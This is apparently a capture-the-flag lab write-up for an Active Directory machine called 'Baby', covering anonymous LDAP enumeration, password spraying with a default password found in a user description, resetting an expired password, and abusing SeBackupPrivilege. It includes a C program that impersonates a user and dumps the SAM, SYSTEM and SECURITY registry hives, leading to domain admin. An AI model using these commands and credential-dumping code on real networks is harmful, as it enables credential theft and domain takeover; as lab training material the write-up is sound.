🚼Baby
You will learn about LDAP-Enumeration & Windows Privileges
IP: 10.10.117.218
Enumeration
This is a standalone machine
One thing we can do after scanning ports is scan ldap using nmap
nmap -n -sV --script "ldap* and not brute" 10.10.117.218 -vv -oN nmap/ldapsearch -Pn
Here we get the informations about the domain, the machine name, ldap policies and AD users

We can check if anonymous LDAP bind is enabled so we can enumerate users from there
ldapsearch -H ldap://baby.vl:3268/ -x -b "dc=baby,dc=vl" "user" | grep cn

We now have a list of users present in the Active directory
Now if we remove user from the command, ldapsearch -H ldap://baby.vl:3268/ -x -b "dc=baby,dc=vl"
we see more informations about every user for example the descriptions

BabyStart123!
is probably the default password that is set for this or other accounts
We can create a list of users and spray the password

It did not work

But looking again at the users we also find Caroline.Robinson
that for some reason did not have a user principal name so the command used to cat the users did not display her

Now using crackmapexec we see that her password needs to be changed

We can use Impacket’s smpasswd to change her password

Privilege Escalation
Now enumerating the privileges of this user we can see that SeBackupPrivilege
and SeRestorePrivilege
are enabled probably because this user is a Backup operator


We can copy SAM and SYSTEM but we also need ntds.dit

We can use a script that mounts the c drive to a E: drive using the diskshadow utility

But for some unknown reasons after trying countless times it did not work
So i used this code to copy the different hives to C:\Windows\Temp
#include <stdio.h>
#include <Windows.h>
void MakeToken() {
HANDLE token;
const char username[] = "Caroline.Robinson";
const char password[] = "Password123!";
const char domain[] = "baby.vl";
if (LogonUserA(username, domain, password, LOGON32_LOGON_NEW_CREDENTIALS, LOGON32_PROVIDER_DEFAULT, &token) == 0) {
printf("LogonUserA: %d\n", GetLastError());
exit(0);
}
if (ImpersonateLoggedOnUser(token) == 0) {
printf("ImpersonateLoggedOnUser: %d\n", GetLastError());
exit(0);
}
}
int main()
{
HKEY hklm;
HKEY hkey;
DWORD result;
const char* hives[] = { "SAM","SYSTEM","SECURITY" };
const char* files[] = { "C:\\windows\\temp\\sam.hive","C:\\windows\\temp\\system.hive","C:\\windows\\temp\\security.hive" };
//Uncomment if using alternate credentials.
MakeToken();
result = RegConnectRegistryA("\\\\baby.vl", HKEY_LOCAL_MACHINE, &hklm);
if (result != 0) {
printf("RegConnectRegistryW: %d\n", result);
exit(0);
}
for (int i = 0; i < 3; i++) {
printf("Dumping %s hive to %s\n", hives[i], files[i]);
result = RegOpenKeyExA(hklm, hives[i], REG_OPTION_BACKUP_RESTORE | REG_OPTION_OPEN_LINK, KEY_READ, &hkey);
if (result != 0) {
printf("RegOpenKeyExA: %d\n", result);
exit(0);
}
result = RegSaveKeyA(hkey, files[i], NULL);
if (result != 0) {
printf("RegSaveKeyA: %d\n", result);
exit(0);
}
}
}

Now we get the NT hash of the machine account babydc$


Then login with the Administrator account and we are DA
Last updated
Was this helpful?